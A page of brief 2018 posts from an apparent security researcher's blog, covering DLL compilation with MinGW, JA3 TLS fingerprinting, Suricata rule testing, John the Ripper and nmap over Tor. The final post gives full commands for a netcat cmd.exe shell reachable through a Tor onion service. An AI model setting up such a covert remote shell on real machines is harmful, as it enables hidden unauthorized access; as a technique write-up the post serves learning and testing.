Didier Stevens

Tuesday 28 August 2018

Quickpost: Compiling DLLs with MinGW on Windows

Filed under: Quickpost — Didier Stevens @ 0:00

MinGW is not only available on Kali, of course, but also on Windows. Compiling a DLL is very similar.

MinGW is installed in folder C:\msys64 on my machine.

 

To compile 64-bit executables, you need to start the 64-bit shell first: launch C:\msys64\mingw64.exe

Then you can compile the DLL:

gcc -shared -o DemoDll-x64.dll DemoDll.cpp

For 32-bit executables, it’s the 32-bit shell: launch C:\msys64\mingw32.exe

Then you can compile the DLL:

gcc -shared -o DemoDll-x86.dll DemoDll.cpp

 

It’s also possible to start the shell and compile from a BAT file:

call C:\msys64\msys2_shell.cmd -mingw64 -here -c "gcc -shared -o DemoDll-x64.dll DemoDll.cpp"
call C:\msys64\msys2_shell.cmd -mingw32 -here -c "gcc -shared -o DemoDll-x86.dll DemoDll.cpp"

 

 


Quickpost info


Saturday 18 August 2018

Quickpost: Revisiting JA3

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

A year ago I tried out JA3. Time for a new test.

This new version no longer crashes on some packets, it’s more stable. However, there’s a bug when producing json output, which is easy to fix.

The JA3 Python program no longer matches TLS fingerprints: it produces a list of data (including fingerprint) for each client Hello packet.

Running this new version on the same pcap file as a year ago (and extracting the fingerprints) yields exactly the same result: 445 unique fingerprints, 7588 in total.

I have more matches this time when matching with the latest version of ja3fingerprint.json: 75 matches compared to 24 a year ago.

Notice that Shodan is one of the matched fingerprints.

Let’s take a closer look:

I’m looking for connections with fingerprint digest 0b63812a99e66c82a20d30c3b9ba6e06:

80.82.77.33 is indeed Shodan:

Name: sky.census.shodan.io
Address: 80.82.77.33


Quickpost info


Tuesday 10 July 2018

Quickpost: Compiling DLLs with MinGW on Kali

Filed under: Quickpost — Didier Stevens @ 0:00

To compile the DLLs from this quickpost with MinGW on Kali, you first have to install MinGW.

Issue this command: apt install mingw-w64

Compile for 64-bit: x86_64-w64-mingw32-gcc -shared -o DemoDll.dll DemoDll.cpp

Compile for 32-bit: i686-w64-mingw32-gcc -shared -o DemoDll-x86.dll DemoDll.cpp

Option -shared is required to produce a DLL in stead of an EXE.


Quickpost info


 

Wednesday 27 June 2018

Quickpost: Decoding Certutil Encoded Files

Filed under: My Software,Quickpost — Didier Stevens @ 0:00

As I showed a colleague, it’s easy to analyze a file encoded with certutil using my base64dump.py tool:

Just use option -w to ignore all whitespace, and base64dump.py will detect and decode the base64 string.

As can be seen in the screenshot, it’s a file starting with MZ: probably a PE file.

We can confirm this with my YARA rule to detect PE files:

Or use pecheck.py:

 


Quickpost info


Wednesday 6 June 2018

Quickpost: John & Dummy Hashes

Filed under: Quickpost — Didier Stevens @ 0:00

I knew you could use dummy hashes with John the Ripper (to test rules, for example), I’ve seen it mentioned in the help. It took me some time however to figure out the exact format of a dummy hash.

It’s like this:

$dummy$48336c6c30

48336c6c30 is the hexadecimal representation of string H3ll0.

The hexadecimal string following $dummy$ has to use lowercase letters. If you use uppercase letters, you’ll get the dreaded “No password hashes loaded (see FAQ)”.

Here is an example using l33t rules:

 


Quickpost info


Monday 28 May 2018

Quickpost: Windows Debugger as Post Mortem Debugger – 32-bit & 64-bit

Filed under: Quickpost,Reverse Engineering — Didier Stevens @ 0:00

I was following Microsoft’s advice to install WinDbg as a post mortem debugger, but didn’t get the expected results.

It turns out that WinDbg x64 version will register itself as the post mortem debugger for 64-bit and 32-bit processes, and not just for 64-bit processes:

Of course, WinDbg x86 version will register itself only for 32-bit processes:

So to make sure that WinDbg x64 version will debug only 64-bit processes and WinDbg x86 version will debug 32-bit processes, run the post mortem registration commands in this order:

"c:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe" -I
"c:\Program Files (x86)\Windows Kits\10\Debuggers\x86\windbg.exe" -I

And of course, run the commands from an elevated command prompt, as you’ll need to write to the HKLM hive. Otherwise you’ll get a reminder:

 


Quickpost info


Tuesday 3 April 2018

Quickpost: Email Server Simulator

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

I needed an email server simulator to test a script I’m writing (a simple email honeypot), and found GreenMail.

It’s a Java application and can thus run on Windows too:

This is the command I used:

java -Dgreenmail.setup.test.all -Dgreenmail.users=testuser1:P#ssw0rd@example.com,testuser2:P#ssw0rd@example.com -Dgreenmail.verbose -Dgreenmail.auth.disabled -jar greenmail-standalone-1.5.7.jar

This command starts all servers (SMTP, POP3, IMAP) on the default ports + 3000 (3025, 3110, …).

I configured 2 user mailboxes, enabled verbosity and disabled authentication.

To send emails to my script, I used Outlook:

Since everything is running on the same machine using localhost (127.0.0.1), I’m using Npcap so that I can capture loopback traffic with Wireshark (WinPcap can not capture loopback traffic).

 


Quickpost info


Tuesday 27 March 2018

Quickpost: Using Suricata on Windows

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

I like to be able to get work done, regardless of the machine I’m using. That’s why I installed Suricata on Windows to help me develop rules.

Here is the process:

Installing Suricata with default settings:

Now that I installed Suricata in the programs folder, I’m going to create a folder with my configurations, rules and test captures. Let’s say that folder is C:\Suricata.

In that folder, I create folders log, rules and projects.

In folder rules, I copy the content of the rules folder in the Suricata programs directory.

threshold.config is an empty file, and suricata.yaml is a copy of suricata.yaml found inside the Suricata programs directory.

You can find the modifications I make to suricata.yaml on GitHub. Of course, you can make more configuration changes, this is just a minimum.

Then, for each project or test, I create a folder in folder projects. Like this mimikatz folder:

I use the following BAT file to start Suricata with my rules and my capture file:

“C:\Program Files (x86)\Suricata\suricata.exe” -c ..\..\suricata.yaml -S mimikatz.rules -l logs -k none -v -r drsuapi-DsGetNCChanges.pcap
pause

With option -S I use my rule file mimikatz.rules (exclusively, no other rule file will be loaded), option -l logs uses my local logs directory to write the log files, -k none disable checksum checks, -v means verbose and -r .pcap reads my capture file for processing by Suricata.

If you get this error:

you need to install WinPcap. Here is the installation with default options:

Then you will get output like this:

When you use option -s in stead of -S, your rule will be loaded together with the rules configured in the configuration file. This will give you warnings, because the rule files are missing:

You can download rules from Emerging Threats and extract the files from the rules folder to your C:\Suricata\rules folder.

Of course, you can also process your capture file without explicit rule:

Please post a comment if you want to share your own preferred configuration options.

 


Quickpost info


Monday 26 February 2018

Quickpost: Using nmap With Tallow (Tor proxy)

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Here’s how I used nmap with Tallow on Windows, a transparent Tor proxy:

ICMP is not supported by the Tor network (hence -Pn) neither SYN scanning (hence TCP scanning -sT).

Flag “Force web-only” blocks all ports except 80 and 443, hence why port 22 is filtered.

 


Quickpost info


Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to 127.0.0.1 port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret of course, I show it here for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Remark that this does not work with version 7.60, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.

 


Quickpost info


« Previous PageNext Page »

Blog at WordPress.com.